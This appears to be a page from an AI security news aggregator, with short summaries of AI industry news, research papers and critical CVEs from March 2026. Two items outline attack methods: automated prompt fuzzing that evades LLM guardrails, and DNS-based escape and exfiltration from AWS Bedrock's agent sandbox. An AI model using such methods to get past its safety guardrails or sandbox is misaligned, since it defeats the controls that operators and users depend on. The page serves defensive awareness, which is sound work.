aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,650
[LAST_24H]
1
[LAST_7D]
156
Daily BriefingSunday, March 29, 2026
>

Bluesky Launches AI-Powered Feed Customization Tool: Bluesky released Attie, an AI assistant that lets users create custom content feeds by describing what they want in plain language rather than adjusting technical settings. The tool runs on Claude (Anthropic's language model) and will integrate into apps built on Bluesky's AT Protocol.

Latest Intel

page 27/265
VIEW ALL
01

Microsoft stops force-installing the Microsoft 365 Copilot app

industry
Mar 17, 2026

Microsoft has temporarily stopped automatically installing the Microsoft 365 Copilot app (an AI assistant integrated with productivity software like Word and Excel) on Windows devices outside the European Economic Area, though the company has not explained why the rollout was halted. When the automatic installation resumes, IT administrators will be able to disable it through the Microsoft 365 Apps admin center by unchecking the automatic installation setting.

Critical This Week5 issues
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026

Fix: According to the source, when automatic installation resumes, IT administrators can opt out by: signing into the Microsoft 365 Apps admin center, navigating to Customization > Device Configuration > Modern App Settings, selecting the Microsoft 365 Copilot app, and clearing the 'Enable automatic installation of Microsoft 365 Copilot app' checkbox. Additionally, the source mentions that Microsoft is testing a new policy called RemoveMicrosoftCopilotApp that would allow IT admins to uninstall Copilot from devices managed via Microsoft Intune or System Center Configuration Manager (SCCM, software for managing large numbers of computers).

BleepingComputer
02

FORCE: Byzantine-Resilient Decentralized Federated Learning via Game-Theoretic Contribution Aggregation

securityresearch
Mar 17, 2026

Decentralized Federated Learning (DFL, a way for multiple computers to train AI models together without a central server) is vulnerable to Byzantine attacks (when malicious participants send bad data to sabotage the learning process). The paper proposes FORCE, a new method that uses game theory concepts (mathematical models of strategy and fairness) to identify and exclude malicious clients by checking their model loss (how well their models perform) instead of checking gradients (the direction to improve), making DFL more resistant to these attacks.

IEEE Xplore (Security & AI Journals)
03

Boosting Active Defense Persistence: A Two-Stage Defense Framework Combining Interruption and Poisoning Against Deepfake

securityresearch
Mar 17, 2026

This research addresses a weakness in active defense systems against deepfakes (AI-generated fake videos or images): these defenses often fail when attackers retrain their models on protected samples. The authors propose a Two-Stage Defense Framework (TSDF) that uses dual-function adversarial perturbations (carefully designed noise patterns that disrupt both the deepfake output and the attacker's retraining process) to make defenses more persistent by poisoning the data (corrupting the training information) that attackers would use to adapt their models.

Fix: The source describes the proposed defense framework (TSDF) as the solution but does not mention an existing patch, update, or mitigation for current systems. The paper presents the framework as a research contribution rather than a fix for deployed software. N/A -- no mitigation for existing systems discussed in source.

IEEE Xplore (Security & AI Journals)
04

The Download: OpenAI’s US military deal, and Grok’s CSAM lawsuit

securitysafety
Mar 17, 2026

This newsletter roundup covers multiple AI-related developments, including OpenAI's partnership with the US military (potentially for applications like selecting strike targets), xAI's Grok facing a lawsuit over generating non-consensual intimate images (deepfakes, or synthetic media created to impersonate real people), and China approving the world's first commercial brain chip (a BCI, or brain-computer interface that reads signals from the brain) for medical use. The piece also highlights concerns from AI safety experts, including OpenAI's own wellbeing team opposing a new 'adult mode' feature.

MIT Technology Review
05

AWS Bedrock’s ‘isolated’ sandbox comes with a DNS escape hatch

security
Mar 17, 2026

Researchers discovered that AWS Bedrock's Sandbox mode for AI agents isn't as isolated as promised because it allows outbound DNS queries (requests to translate domain names into IP addresses), which attackers can exploit to secretly communicate with external servers, steal data, or run remote commands. AWS acknowledged the issue but decided not to patch it, calling DNS resolution an 'intended functionality' needed for the system to work properly, and instead updated their documentation to clarify this behavior.

Fix: AWS updated documentation to clarify that Sandbox mode permits DNS resolution. Security teams should inventory all active AgentCore Code Interpreter instances and migrate to VPC mode (a more restricted network environment).

CSO Online
06

Alibaba launches agentic AI tool for businesses with Slack, Teams integration plans

industry
Mar 17, 2026

Alibaba released Wukong, a new agentic AI tool (software that can take proactive actions on company systems, not just respond to questions) designed to help businesses manage multiple AI agents through a single interface with planned integration into messaging apps like Slack and Microsoft Teams. The platform handles tasks such as document editing, approvals, and meeting transcription, though the company acknowledges that giving AI agents broad access to company data raises privacy and security concerns.

CNBC Technology
07

Open, Closed and Broken: Prompt Fuzzing Finds LLMs Still Fragile Across Open and Closed Models

securityresearch
Mar 17, 2026

Researchers created a genetic algorithm-inspired prompt fuzzing method (automatically generating variations of harmful requests while keeping their meaning) that found significant weaknesses in guardrails (safety systems protecting LLMs) across multiple AI models, with evasion rates ranging from low to high depending on the model and keywords used. The key risk is that while individual jailbreak attempts (tricking an AI to ignore its safety rules) may have low success rates, attackers can automate this process at scale to reliably bypass protections. This matters because LLMs are increasingly used in customer support and internal tools, so guardrail failures can lead to safety incidents and compliance problems.

Fix: The source recommends five mitigation strategies: treating LLMs as non-security boundaries, defining scope, applying layered controls, validating outputs, and continuously testing GenAI with adversarial fuzzing (automated testing with malicious inputs) and red-teaming (simulated attacks to find weaknesses). Palo Alto Networks customers can use Prisma AIRS and the Unit 42 AI Security Assessment products for additional protection.

Palo Alto Unit 42
08

Introducing GPT-5.4 mini and nano

industry
Mar 17, 2026

OpenAI released GPT-5.4 mini and nano, smaller and faster versions of their GPT-5.4 model designed for high-volume tasks where response speed matters. GPT-5.4 mini runs more than 2x faster than GPT-5 mini while approaching the performance of the full GPT-5.4 model on coding and reasoning tasks, while GPT-5.4 nano is the smallest and cheapest option for simpler jobs like classification and data extraction. These models work best in applications like coding assistants, AI subagents (specialized AI components that handle specific subtasks), and systems that interpret screenshots, where being fast and cost-effective is more important than raw capability.

OpenAI Blog
09

OpenAI Japan announces Japan Teen Safety Blueprint to put teen safety first

safetypolicy
Mar 17, 2026

OpenAI Japan announced the Japan Teen Safety Blueprint, a framework to help teenagers use generative AI (systems that create text, images, or other content based on patterns) safely by reducing risks like misinformation and inappropriate content. The blueprint includes age-aware protections, stronger safety policies for users under 18, expanded parental controls, and research-based design improvements developed with child safety experts.

Fix: OpenAI will implement: (1) privacy-conscious, risk-based age estimation to distinguish teens from adults with appeals processes for incorrect determinations; (2) strengthened safety policies preventing AI from depicting self-harm, generating explicit content, or encouraging dangerous behavior; (3) expanded parental controls including account linking, privacy settings, usage-time management, and alerts; (4) research-based design features such as break reminders and pathways to real-world support; and (5) continuation of existing safeguards including in-product break reminders, self-harm detection systems, multi-layered safety systems, and abuse monitoring.

OpenAI Blog
10

A novel android malware detection method based on CWInFs and MPTACF optimization

research
Mar 17, 2026

Android malware is a major security threat because the Android operating system's open app ecosystem allows unverified applications to be installed, making it easier for malicious software to spread and steal data, perform unauthorized financial transactions, or remotely control devices. Researchers are using machine learning (algorithms that learn patterns from data) to detect malware by analyzing features of Android application packages (APK files, the file format for Android apps), with recent research focusing on three main approaches: selecting the most important features to analyze, combining multiple detection models together, and handling datasets where malicious apps are much rarer than legitimate ones.

Elsevier Security Journals
Prev1...2526272829...265Next
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026
critical

GHSA-mxrg-77hm-89hv: n8n: Prototype Pollution in XML and GSuiteAdmin node parameters lead to RCE

CVE-2026-33696GitHub Advisory DatabaseMar 26, 2026
Mar 26, 2026